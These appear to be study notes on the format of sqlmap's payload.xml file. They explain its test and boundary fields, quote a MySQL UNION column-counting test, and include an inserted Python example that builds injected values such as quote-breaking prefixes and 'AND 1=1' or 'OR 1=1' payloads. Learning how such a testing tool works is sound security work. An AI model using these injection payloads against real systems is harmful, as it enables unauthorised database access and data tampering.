sqlmap Study Notes (2)

The previous post touched on payload.xml; this one goes through it in detail.

The payload.xml help text reads:
<!--
Tag: <boundary>
How to prepend and append to the test ' <payload><comment> ' string.

Sub-tag: <level>
From which level check for this test.

Valid values:
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)

Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name

A comma separated list of these values is also possible.

Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: When the value of <test>'s <where> is 1.
2: When the value of <test>'s <where> is 2.
3: When the value of <test>'s <where> is 3.

A comma separated list of these values is also possible.

Sub-tag: <ptype>
What is the parameter value type.

Valid values:
1: Unescaped numeric
2: Single quoted string
3: LIKE single quoted string
4: Double quoted string
5: LIKE double quoted string

Sub-tag: <prefix>
A string to prepend to the payload.

Sub-tag: <suffix>
A string to append to the payload.


Tag: <test>
SQL injection test definition.

Sub-tag: <title>
Title of the test.

Sub-tag: <stype>
SQL injection family type.

Valid values:
0: Heuristic check to parse response errors
1: Boolean-based blind SQL injection
2: Error-based SQL injection
3: UNION query SQL injection
4: Stacked queries SQL injection
5: AND/OR time-based blind SQL injection

Sub-tag: <level>
From which level check for this test.

Valid values:
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)

Sub-tag: <risk>
Likelihood of a payload to damage the data integrity.

Valid values:
0: No risk
1: Low risk
2: Medium risk
3: High risk

Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name

A comma separated list of these values is also possible.

Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string

Sub-tag: <vector>
The payload that will be used to exploit the injection point.

Sub-tag: <request>
What to inject for this test.

Sub-tag: <payload>
The payload to test for.

Sub-tag: <comment>
Comment to append to the payload, before the suffix.

Sub-tag: <char>
Character to use to bruteforce number of columns in UNION
query SQL injection tests.

Sub-tag: <columns>
Range of columns to test for in UNION query SQL injection
tests.

Sub-tag: <response>
How to identify if the injected payload succeeded.

Sub-tag: <comparison>
Perform a request with this string as the payload and compare
the response with the <payload> response. Apply the comparison
algorithm.

NOTE: useful to test for boolean-based blind SQL injections.

Sub-tag: <grep>
Regular expression to grep for in the response body.

NOTE: useful to test for error-based SQL injection.

Sub-tag: <time>
Time in seconds to wait before the response is returned.

NOTE: useful to test for time-based blind and stacked queries
SQL injections.

Sub-tag: <union>
Calls unionTest() function.

NOTE: useful to test for UNION query (inband) SQL injection.

Sub-tag: <oob>
# TODO

Sub-tag: <details>
Which details can be infered if the payload succeed.

Sub-tags: <dbms>
What is the database management system (e.g. MySQL).

Sub-tags: <dbms_version>
What is the database management system version (e.g. 5.0.51).

Sub-tags: <os>
What is the database management system underlying operating
system.

Formats:
<boundary>
<level></level>
<clause></clause>
<where></where>
<ptype></ptype>
<prefix></prefix>
<suffix></suffix>
</boundary>

<test>
<title></title>
<stype></stype>
<level></level>
<risk></risk>
<clause></clause>
<where></where>
<vector></vector>
<request>
<payload></payload>
<comment></comment>
<char></char>
<columns></columns>
</request>
<response>
<comparison></comparison>
<grep></grep>
<time></time>
<union></union>
<oob></oob>
</response>
<details>
<dbms></dbms>
<dbms_version></dbms_version>
<os></os>
</details>
</test>
-->


Here is an example of a test:
    <test>
        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
        <stype>3</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,4,5</clause>
        <where>1</where>
        <vector>[UNION]</vector>
        <request>
            <payload/>
            <comment>#</comment>
            <char>NULL</char>
            <columns>1-10</columns>
        </request>
        <response>
            <union/>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>


First, as the comment shows, the payloads file consists of two kinds of elements: <boundary> and <test>. A boundary refers to the wrapping characters used during injection, things like ' ) ( and 1=1 and '1'='1, while a test is the concrete statement used during injection, something like a select. The difference between the two is fairly clear.

Let's first go over the sub-elements that the two elements share:

1. The level attribute. Every test must have it, and it states which tier the test belongs to in SQL injection testing. In other words, when you actually run sqlmap you need to specify the run level; the default is 1 and any value from 1 to 5 can be given. At level=1 roughly fewer than 100 injection tests are executed; the higher the level, the more tests run, and if you specify level 5 then every test marked 1, 2, 3, 4 or 5 will be executed. Note that running level 5 will probably execute more than 1000 SQL injection statements, and if you then go on to guess table contents there will be even more. More injection tests is not automatically better: it puts a heavy load on the connection. Also, the example above, UNION query (NULL), is level 1, the most basic test; in practice, testing the number of columns with union null is also the most common technique. But if you actually use it you will notice a problem: later on there are similar tests for 11-20 columns and 21-30 columns, and they have been given different levels. The authors presumably assumed a query rarely has more than 10 columns, but I don't think that is very reasonable, so I recommend changing the level of those later tests to 1 as well; in practice the results are very good.

2. The clause attribute. This is a condition attribute, and several values can be selected when editing a test.

From the help text:
Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name

 

Look at the example <title>MySQL UNION query (NULL) - 1 to 10 columns</title> above: <clause>1,2,3,4,5</clause> means the union can be used in the WHERE/HAVING, GROUP BY, ORDER BY, LIMIT and OFFSET clauses. In the many tests that follow you will see that basically only the first few values are commonly used, especially 1-5; and if you are not sure about a SQL statement of your own, just mark it as 1.

3. The where attribute.

From the help text:
Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: When the value of <test>'s <where> is 1.
2: When the value of <test>'s <where> is 2.
3: When the value of <test>'s <where> is 3.

A comma separated list of these values is also possible.

That is the comment in its boundary section, which I suspect was written wrong; the comment in the test section reads:
Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string


This one is presumably correct. In practice, 1 means appending to the original parameter value, along the lines of id=1 '; 2 is along the lines of id=31231 '; and 3 is along the lines of id='. The subtle differences are worth thinking through, and the specific SQL has to be treated on its own terms.

Next come the concepts unique to each element.

4. The ptype attribute in <boundary>

From the help text:
1: Unescaped numeric
2: Single quoted string
3: LIKE single quoted string
4: Double quoted string
5: LIKE double quoted string

This is simply the type of the boundary's value: numeric, single-quoted string, or double-quoted string.

5. The <prefix> and <suffix> pair in <boundary> are the prefix and suffix. For example, since in practice a payload may be repeated and iterated, like that union null one, something like select can be set as the prefix.

6. Concepts unique to <test>

<title> is for display and is not of much use, but don't give it a meaningless name either. Something like Microsoft SQL Server/Sybase error-based - Parameter replace is good: it states the database name, the injection type and the specific function.

<stype> is a fairly important attribute.

From the help text:
Valid values:
0: Heuristic check to parse response errors
1: Boolean-based blind SQL injection
2: Error-based SQL injection
3: UNION query SQL injection
4: Stacked queries SQL injection
5: AND/OR time-based blind SQL injection


This is a classification: which functional module the test you wrote belongs to, whether it is blind, UNION-based, time-based and so on. This is also quite straightforward.

<risk> is also a very important attribute.

From the help text:
Valid values:
0: No risk
1: Low risk
2: Medium risk
3: High risk


In essence: if your SQL injection statement contains update, insert, delete or something even more drastic, do not set this to 0, and when you use sqlmap yourself do not casually set --risk to a high value, because higher-risk operations have a DDL-like nature and can easily change the data in the database. Be careful and deliberate.
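As an added example (not code from this post or from sqlmap itself), the following Python parses a small constructed document in the payloads layout above and shows how <level> and <risk> gate which tests are scheduled, how a boundary's <clause> and <where> pair it with a test, and how the test's <where> rule places the '<prefix> <payload><comment> <suffix>' string around the parameter value. The XML values are constructed samples, and the pairing logic and spacing are simplifications assumed for illustration rather than sqlmap's exact behaviour.

```python
import xml.etree.ElementTree as ET
# Constructed miniature document in the payload.xml layout described above;
# sample values only, not copied from sqlmap's own payload files.
PAYLOADS_XML = """<root>
  <boundary>
    <level>1</level><clause>1</clause><where>1</where><ptype>2</ptype>
    <prefix>'</prefix><suffix>AND 'a'='a</suffix>
  </boundary>
  <boundary>
    <level>1</level><clause>1,2,3</clause><where>1,2,3</where><ptype>1</ptype>
    <prefix></prefix><suffix></suffix>
  </boundary>
  <test>
    <title>AND boolean-based blind</title><stype>1</stype>
    <level>1</level><risk>1</risk><clause>1</clause><where>1</where>
    <request><payload>AND 1=1</payload><comment></comment></request>
  </test>
  <test>
    <title>OR boolean-based blind</title><stype>1</stype>
    <level>2</level><risk>3</risk><clause>1</clause><where>2</where>
    <request><payload>OR 1=1</payload><comment></comment></request>
  </test>
</root>"""

def parse_payloads(xml_text):
    root = ET.fromstring(xml_text)
    return root.findall("boundary"), root.findall("test")

def _ints(node, tag):
    # <clause> and <where> may hold a comma separated list of values
    return {int(v) for v in (node.findtext(tag) or "").split(",") if v.strip()}

def select_tests(tests, level, risk):
    # A test is scheduled only when its <level> and <risk> do not exceed the
    # values chosen on the command line, so level 5 / risk 3 runs everything.
    return [t for t in tests
            if int(t.findtext("level")) <= level and int(t.findtext("risk")) <= risk]

def matching_boundaries(boundaries, test):
    # Pair a boundary with a test when their <clause> sets overlap (0 = always)
    # and the test's <where> value is listed in the boundary's <where>.
    t_clause, t_where = _ints(test, "clause"), _ints(test, "where")
    return [b for b in boundaries
            if (0 in _ints(b, "clause") or 0 in t_clause or _ints(b, "clause") & t_clause)
            and _ints(b, "where") & t_where]

def build_value(original, boundary, test, rand_int=-1337):
    # Assemble '<prefix> <payload><comment> <suffix>' and place it by the test's
    # <where> rule: 1 append, 2 negative random integer (fixed here), 3 replace.
    prefix, suffix = boundary.findtext("prefix") or "", boundary.findtext("suffix") or ""
    req = test.find("request")
    core = f"{prefix} {req.findtext('payload') or ''}{req.findtext('comment') or ''} {suffix}".strip()
    sep = "" if prefix else " "  # spacing simplified relative to sqlmap itself
    where = int(test.findtext("where"))
    if where == 1:
        return f"{original}{sep}{core}"
    if where == 2:
        return f"{rand_int}{sep}{core}"
    return core

def candidate_pairs(boundaries, tests, level, risk):
    # Each surviving (boundary, test) pair costs at least one request: this is
    # why raising --level or --risk inflates traffic so quickly.
    return [(b, t) for t in select_tests(tests, level, risk)
            for b in matching_boundaries(boundaries, t)]
```

Counting the pairs returned by candidate_pairs for different level and risk values is a quick way to see how much extra traffic a higher setting costs before running anything.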


<vector> is the SQL injection pattern to be executed; in the example above it is <vector>[UNION]</vector>, which is in fact a union all select pattern. This is a detail I still need to study further.

<response> and <request> are the most critical part of SQL injection testing; they were designed with a great deal of flexibility and cleverness. I'll cover them next time.